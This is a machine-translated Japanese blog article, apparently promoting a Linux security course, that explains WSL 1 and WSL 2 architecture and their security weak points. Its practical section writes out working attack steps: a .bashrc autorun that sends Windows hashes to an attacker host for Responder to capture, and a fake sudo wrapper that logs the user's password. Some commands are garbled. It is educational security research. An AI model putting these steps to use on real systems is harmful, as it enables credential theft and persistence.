WSL実験。パート1

こんにちはhabr！10月、OTUSは新しいLinuxセキュリティコースストリームを開始します。コース開始の前夜に、教師の1人であるAlexanderKolesnikovが書いた記事をあなたと共有します。

---

2016年、マイクロソフトは新しいテクノロジーWSL（W indows S ubsystem for Linux）は、長期的には、通常のOSユーザーと上級OSユーザーの両方（WindowsとLinux）の間で人気を求めて戦った以前は和解できなかった競合他社を団結させることを可能にしました。このテクノロジーにより、たとえばマルチブートを使用してLinuxを起動しなくても、Windows環境でLinuxOSツールを使用できるようになりました。 Habrには、WSLを使用する利点を説明する多数の記事があります。ただし、残念ながら、記事が作成された時点では、このリソースでこのようなオペレーティングシステムの共生に関するセキュリティ調査は見つかりませんでした。この投稿はそれを修正しようとします。この記事では、WSL 1および2アーキテクチャの機能について説明し、これらのテクノロジを使用したシステムへの攻撃のいくつかの例を分析します。記事は2つの部分に分かれています。1つ目は、LinuxおよびWindows攻撃の基本的な理論的方法を提供します。 2番目の記事には、テスト環境のセットアップと攻撃の再生が含まれます。

WSL 1：アーキテクチャ機能

WSLセキュリティの問題に最も正確に没頭するには、サブシステムの実装に関連する主なニュアンスを決定する必要があります。WSLによって解決される主なユーザータスクの1つは、WindowsOSを備えたホスト上のターミナルLinuxシステムを介して動作する機能を提供することです。また、提案された互換性は非常にネイティブであるため、Linux実行可能ファイル（ELF）をWindowsシステムで直接実行できます。これらの目標を達成するために、特定のシステム呼び出しのセットを使用してLinuxアプリケーションを実行できるようにする特別なサブシステムがWindows 10で作成されました。したがって、LinuxsyscallのセットをWindowsにマップする試みが行われました。物理的には、これは新しいドライバーと新しいプロセス形式を追加することによって行われました。視覚的には、アーキテクチャは次のようになりました。







実際、Linuxオペレーティングシステムとの相互作用は、いくつかの核モジュールと特別な種類のプロセス（pico）によって構成されていました。上の図から、ホスト上のLinuxインスタンスで実行されているプロセスはネイティブであり、通常のWindowsアプリケーションと同じリソースを使用する必要があることがわかります。しかし、これはどのように達成できますか？Drawbridgeプロジェクトは、異なるOSアプリケーションを実行するために必要なすべてのオペレーティングシステムコンポーネント（バージョンに応じて）を提供するWindowsプロセスの概念を開発しました。

提案された抽象化により、別のOSのプロセスが開始されることが予想されるオペレーティングシステム（特にWindows）に焦点を当てないことが可能になり、一般的なアプローチが提供されたことに注意してください。

したがって、picoプロセス内の任意のアプリケーションは、Windowsカーネルを見なくても実行できます。

1. 互換性とシステムコール変換の問題は、専用プロバイダーが対処する必要があります。
2. アクセス制御は、セキュリティモニターを介して行う必要があります。モニターはカーネル内にあるため、Windowsは、そのようなプロセスのプロバイダーとして機能できる新しいドライバーの形でアップグレードする必要がありました。ピコプロセスのプロトタイプを以下に概略的に示します。

Linuxファイルシステムは大文字と小文字を区別するファイル名とディレクトリ名を使用するため、WSLを処理するために2種類のファイルシステム（VolFSとDriveFS）がWindowsに追加されました。VolFSはLinuxファイルシステムの実装です。DriveFSはWindowsのルールに従って機能するファイルシステムですが、名前の大文字と小文字を区別する機能を選択できます。

WSL 2

WSL 1には、最大範囲のタスクを解決するために使用できないといういくつかの制限がありました。たとえば、32ビットのLinuxアプリケーションを実行する機能がなく、デバイスドライバーを使用できませんでした。そのため、2020年にWSL 2がリリースされ、サブシステムの構築方法が変わりました。 WSL 2は、WSL1のリソース消費特性を満たす最適化された仮想マシンです。これで、Windowsユーザーが解決した問題に応じて、必要なバージョンのLinuxサブシステムを選択できます。潜在的な脆弱性を軽減するために、WSL2はWindows10のHyper-Vに基づいて実装されました。この形式では、WindowsにはLinuxカーネルを分離して実行する機能があります。 WSLのバージョン1がベータ機能として導入されたことを覚えておく価値があります。これは、この分野でのWindowsの開発のベクトルを示すはずだったため、Hyper-Vへの移行は避けられませんでした。最終的なアーキテクチャは次のようになります。







このバージョンでは、WindowsカーネルとLinuxカーネルに独自のリソースがあり、交差点はファイルシステムにのみ存在しますが、この交差点は完全ではありません。ファイルシステム間の相互作用は、9Pプロトコルで実行されるクライアントサーバーラッパーによって実行されます。



現在、MicrosoftはWSL1とWSL2を切り替える機能を提供しています。どちらのバージョンも使用できます。

WSLセキュリティ

現時点では、正当なOSツールを使用してサブシステム間の相互作用を攻撃するためのいくつかのアプローチを説明するいくつかの論文があります。この記事の執筆時点では、スクリプトを使用して攻撃の関連性を確認します。攻撃とシナリオの一般的なリスト：



1。ファイルシステムの実装：アクセス権、共有ディレクトリの存在/データ交換メカニズム。



調査は、Linux FS-> Windows FS、Windows FS-> LinuxFSからのアクセスルールの違反をテーマに実施されました。調査により、ターゲットOS内の特定のファイルを変更できることが実証されています。ファイルシステムの一部を置き換え、複製を作成し、削除する試みも行われました。



シナリオ：

• A.Windowsオペレーティングシステムからの攻撃-Linuxの/ etcディレクトリからファイルを変更します。
• LinuxオペレーティングシステムのB.攻撃-ディレクトリ内のファイルの変更：C:\Windows、 C:\Program Files、C:\Users\<User>

2.ネットワークスタックの実装。



調査は、Windows上のLinuxオペレーティングシステムからの攻撃の例で実施されました。ネットワークスタックの機能、つまり、さまざまなリソースの認証メカニズムが使用されました。



シナリオ：

• Windowsシステムでビジーなポートへのアクセスを開く
• 適切な権利がない場合の開港
• Windowsオペレーティングシステムでelfファイルを使用してリバースシェルを起動します。

3.WSLサブシステムを使用した悪意のあるソフトウェアプロセスの起動の隠蔽。



調査は単純な事実に基づいていました。セキュリティサブシステムは別のコアのイベントをインターセプトできません。これは、WSL 1の場合はオペレーティングシステムの正当なプロバイダーを使用して機能します。WSL2の場合、内の別のコアで発生するイベントを表示する方法はありません。軽い仮想マシン。



シナリオ：



1）システムへのリモートアクセス用にアプリケーションを起動し、ログに記録されたイベントを表示します。

WSL 1実験：ハッシュキャッチ（Windows OS）

最後に、実用的な部分に到達しました。まず、テスト用の環境を設定する必要があります。すべての実験は、Windows 102004がインストールされたブースで実行されます。Ubuntu18.04がWSLのオペレーティングシステムイメージとして選択されました。画像はランダムに選択され、他の画像も同じように機能します。スタンドを設定するためのコマンド：



まず、powershell.exe管理者として実行する必要があります。



WSL 1の場合、次のコマンドを実行する必要があります。 スタンドを再起動した後、bashコマンドを呼び出すことができます。すべてが正常に機能した場合、Windowsコンソールに次のようなものが表示 されます。攻撃者のマシンとしてKali Linuxディストリビューションを使用します。すべてのマシンは、同じローカルネットワーク上にある必要があります。

1. Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux # WSL
2. Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804

-OutFile ~/Ubuntu.appx -UseBasicParsing # Linux Microsoft

Ubuntu.appx install —root #

, , , root. sam.

Restart-Computer #

WindowsマシンでWSLに特権なしでアクセスできると仮定しましょう。Linuxからコマンドを呼び出して、Linuxオペレーティングシステムを攻撃してみましょう。攻撃を実装するために、単純な自動実行手法を使用します。Linux環境で実行するためのスクリプトを追加します。これを行うには、ファイルを変更する必要があります.bashrc。



WSLを搭載したマシンで、次を実行します。

	1. bash
	2.     : cd /home/sam/
	2. echo  «/home/sam/.attack.sh» >> .bashrc
	3. echo «icalcs.exe \» \\\\\\\\attacker_ip\\\\shareName\\\\\» > /dev/null 2>&1» >> .attack.sh
	4. chmod u+x .attack.sh
	5. exit

Kali Linuxマシンで、次を実行します。

1. Responder -I eth0 -rdvw

Windowsマシンで、bashを実行します。



Kali Linuxマシンでの結果を待ってい







ます。したがって、Linuxシステムでコマンドを実行することにより、WSLサブシステムを介してWindowsユーザーのハッシュを取得しました。

WSL 1の実験：ユーザーパスワードの取得（Linux OS）

もう1つ実験してみましょう。このチェック中.bashrcに、Linuxオペレーティングシステムのユーザーのパスワードを取得するために、ファイルにいくつかのコマンドを追加します。



bashを開始して、次のコマンドを入力してみましょう。

1. mkdir .hidden
2. echo "export PATH=\$HOME/.hidden/:\$PATH:" >> .bashrc
3. echo "read -sp \"[sudo] password for $USER: \" sudopass" > .hidden/sudo
4. echo "echo \"\"" >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo \"Sorry, try again.\"" >> .mysudo/sudo
7. echo "echo \$sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo \$@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit

攻撃を正常に完了するには、ユーザーSamがLinuxターミナルでsudoを呼び出す必要があります。その後、Linux OSユーザーパスワードがファイルに含まれますpass.txt。







攻撃の実装は、理論的な情報のためにのみ提示されました。



記事の次のパートでは、9Pプロトコルの実装について説明し、このプロトコル用のスキャナーの作成を検討し、それを使用して攻撃を実行します。

中古文献一覧

• WSL 2 RESEARCH INTO BADNESS
• Linuxドキュメント用のWindowsサブシステム

続きを読む

• リアルタイムLinuxカーネルパッチングソフトウェアの選択方法